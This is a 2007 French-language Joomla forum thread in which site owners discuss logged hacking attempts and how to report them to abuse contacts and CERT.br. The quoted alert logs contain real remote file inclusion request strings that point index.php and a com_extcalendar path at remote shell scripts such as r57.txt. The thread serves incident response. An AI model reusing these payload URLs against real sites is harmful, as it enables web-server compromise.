Joomladay francophone 2018 à Paris 18 et 19 mai

Tentative de hack

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Tentative de hack

    Après avoir appliqué avec soin les conseils du kit de protection de base pour Joomla!, j'ai eu ma première tentative d'attaque (environ 3 jours plus tard !).
    Comme le site est toujours là et a priori bien protégé, je suppose qu'il n'y a pas de problème. Mais à part ça, faut-il faire quelque chose avec les informations du mail reçu ?
    Dernière édition par jfque à 16/09/2007, 18h09
    Tous les services pour les sites Joomla! : sécurité, nettoyage de sites piratés, hébergement, SEO, applications, migration, compatibilité mobiles, accessibilité, ...

    https://www.betterweb.fr/services

  • #2
    whois sur geektools.com et transmettre une plainte à l'adresse abuse avec log + horodatage en AM ou PM (ne pas oublier le fuseau horaire GMT+2 )

    Commentaire


    • #3
      Merci de votre réponse.
      Si vous avez encore un peu de temps à me consacrer, merci de m'aider à déchiffrer l'information reçue.

      Voici d'abord le contenu du mail que j'ai reçu :

      Code:
      Une tentative de hacking commise sur www.bepa.be par 200.142.86.12 en appelant /index.php?option=http://intrusion.hut2.ru/.../.../.../r57.txt?
      
      HTTP_SERVER_VARS:
      
      HTTP_HOST_NAME => 200-142-86-12.webnow.com.br
      
      DOCUMENT_ROOT => /home/httpd/vhosts/www.bepa.be/web
      GATEWAY_INTERFACE => CGI/1.1
      HTTP_CONNECTION => TE, close
      HTTP_HOST => www.bepa.be
      HTTP_TE => deflate,gzip;q=0.3
      HTTP_USER_AGENT => libwww-perl/5.65
      PATH => /bin:/usr/bin
      PHPRC => /home/httpd/vhosts/www.bepa.be/.conf/php4
      QUERY_STRING => option=http://intrusion.hut2.ru/.../.../.../r57.txt?
      REDIRECT_STATUS => 200
      REMOTE_ADDR => 200.142.86.12
      REMOTE_HOST => 200-142-86-12.webnow.com.br
      REMOTE_PORT => 40037
      REQUEST_METHOD => GET
      REQUEST_URI => /index.php?option=http://intrusion.hut2.ru/.../.../.../r57.txt?
      SCRIPT_FILENAME => /home/httpd/vhosts/www.bepa.be/web/index.php
      SCRIPT_NAME => /index.php
      SCRIPT_URI => http://www.bepa.be/index.php
      SCRIPT_URL => /index.php
      SERVER_ADDR => 80.80.228.62
      SERVER_ADMIN => info@bepa.be
      SERVER_NAME => www.bepa.be
      SERVER_PORT => 80
      SERVER_PROTOCOL => HTTP/1.1
      SERVER_SIGNATURE => 
      SERVER_SOFTWARE => Apache
      PHP_SELF => /index.php
      Ensuite voici les résultats du Whois (fait chez DNSStuff dont je suis membre) :

      Code:
      WHOIS - 200.142.86.12
      
      Location: Brazil [City: ]
      
      ARIN says that this IP belongs to LACNIC; I'm looking it up there.
      
      
      % Joint Whois - whois.lacnic.net
      %  This server accepts single ASN, IPv4 or IPv6 queries
       
      
      % Copyright (c) Nic.br
      %  The use of the data below is only permitted as described in
      %  full by the terms of use (http://registro.br/termo/en.html),
      %  being prohibited its distribution, comercialization or
      %  reproduction, in particular, to use it for advertising or
      %  any similar purpose.
      %  2007-09-17 12:49:17 (BRT -03:00)
      
      % Query rate limit exceeded. Reduced information.
      
      inetnum:     200.142.86.0/26
      aut-num:     AS8167
      owner:       WebNow! Tecnologia Ltda (361593)
      created:     20051104
      changed:     20051104
      inetnum-up:  200.142.64/19
      
      % Security and mail abuse issues should also be addressed to
      % cert.br, http://www.cert.br/, respectivelly to ****@cert.br
      % and **********@cert.br
      %
      % whois.registro.br accepts only direct match queries. Types
      % of queries are: domain (.br), ticket, provider, ID, CIDR
      % block, IP and ASN.
      Tout ça est un peu du chinois pour moi. Qui est registro.br ? Est-ce bien à cert.br qu'il faut déclarer l'abus ? Avec quelles informations ?
      Tous les services pour les sites Joomla! : sécurité, nettoyage de sites piratés, hébergement, SEO, applications, migration, compatibilité mobiles, accessibilité, ...

      https://www.betterweb.fr/services

      Commentaire


      • #4
        Chaque pays dispose d'une cellule CERT qui est en charge de traduire les plaintes et les transmettre aux hébergeurs.

        Dans le cas présent, l'hébergeur peu scrupuleux ne dispose pas de contact email-abuse oubien il s'agit probablement d'un établissement publique genre université ......

        Le seule moyen de faire entendre cette plainte est ainsi de passer par le CERT.br

        ++++++++++++++++++++++++
        CERT.br Contact Information
        To contact CERT.br regarding security incidents related to Brazilian networks send an email to:

        CERT.br <cert@cert.br>

        ++++++++++++++++++++++++
        PS Nous sommes toujours en GMT+2 à ne pas oublier dans l'horodatage.

        Commentaire


        • #5
          Voir ceci : Que faire après avoir été hacker !
          et cela : Hack de sites joomla : quels composants sont visés ?
          Apprendre à apprendre........
          www.octeam.fr
          Pas de support par MP

          Commentaire


          • #6
            Un exemple de plainte transmise le mois dernier

            Subject: Complain about hack attemp from IP 87.106.5.113

            Hello,

            Just to inform you that the IP adress 87.106.5.113 hosted on your network make today 1 attempt to hack my website xxxxxxfr with a script the 12 of september 01:48 AM GMT+2.
            I hope it wil help you to stop this illegal activity.

            Thanks

            Gilles xxxxxxxx
            °°°°°°°°°°°°°°°°°°°°°°

            [September 12 2007 01:48:37]Hacking attemps on the website xxxxxxxxxxxxxx.free.fr WITH 87.106.5.113 calling /index.php?option=com_extcalendar&extmode=day&date= 2007-09-28//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sexofv.com/galerias/rubias/amy-1/mini/prs.txt?

            HTTP_SERVER_VARS:

            HTTP_HOST_NAME => s15205154.rootmaster.info

            FCGI_ROLE => RESPONDER
            DOCUMENT_ROOT => /mnt/130/sda/1/4/xxxxxxxxxxxxxx
            HTTP_ACCEPT => */*
            HTTP_HOST => xxxxxxxxxxxxxx.free.fr
            HTTP_USER_AGENT => Mozilla/5.0
            PATH => /usr/local/sbin:/usr/local/bin:/usr/bin:/usr/sbin:/sbin:/bin
            REMOTE_ADDR => 87.106.5.113
            REMOTE_PORT => 59379
            SCRIPT_FILENAME => /mnt/130/sda/1/4/x/index.php
            SERVER_ADDR => 212.27.63.130
            SERVER_NAME => xxxxxx
            SERVER_PORT => 80
            SERVER_SIGNATURE => <ADDRESS>Apache/ProXad [May 15 2007 17:32:33] Server at xxxxxxxxxxxxxxxfree.fr Port 80</ADDRESS>

            SERVER_SOFTWARE => Apache/ProXad [May 15 2007 17:32:37]
            GATEWAY_INTERFACE => CGI/1.1
            SERVER_PROTOCOL => HTTP/1.0
            REQUEST_METHOD => GET
            QUERY_STRING => option=com_extcalendar&extmode=day&date=2007-09-28//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sexofv.com/galerias/rubias/amy-1/mini/prs.txt?
            REQUEST_URI => /index.php?option=com_extcalendar&extmode=day&date= 2007-09-28//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sexofv.com/galerias/rubias/amy-1/mini/prs.txt?
            SCRIPT_NAME => /index.php
            ORIG_SCRIPT_NAME => /index.php
            ORIG_SCRIPT_FILENAME => /mnt/130/sda/1/4/xxxxxxxxxxxxxx/index.php
            TERM => linux
            PHP_FCGI_CHILDREN => 70
            PWD => /
            SHLVL => 1
            PHP_FCGI_MAX_REQUESTS => 10
            _ => /usr/php5/bin/php5
            PHP_SELF => /index.php
            REQUEST_TIME => 1189554500
            argv => Array
            argc => 1
            Dernière édition par Gilles.29 à 26/09/2007, 20h38

            Commentaire

            Annonce

            Réduire
            1 sur 2 < >

            C'est [Réglé] et on n'en parle plus ?

            A quoi ça sert ?
            La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

            Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

            Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
            Comment ajouter la mention [Réglé] à votre discussion ?
            1 - Aller sur votre discussion et éditer votre premier message :


            2 - Cliquer sur la liste déroulante Préfixe.

            3 - Choisir le préfixe [Réglé].


            4 - Et voilà… votre discussion est désormais identifiée comme réglée.

            2 sur 2 < >

            Assistance au forum - Outil de publication d'infos de votre site

            Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

            Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

            Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

            UTILISER À VOS PROPRES RISQUES :
            L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

            Problèmes connus :
            FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

            Installation :

            1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

            Archive zip : https://github.com/AFUJ/FPA/zipball/master

            2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

            3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

            4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

            5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

            6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
            et remplacer www. votresite .com par votre nom de domaine


            Exemples:
            Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/
            Pour executer le script: http://www..com/fpa-fr.php

            Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
            Télécharger le script fpa-fr.php dans: /public_html/cms/
            Pour executer le script: http://www..com/cms/fpa-fr.php

            En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

            Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
            Voir plus
            Voir moins
            Travaille ...
            X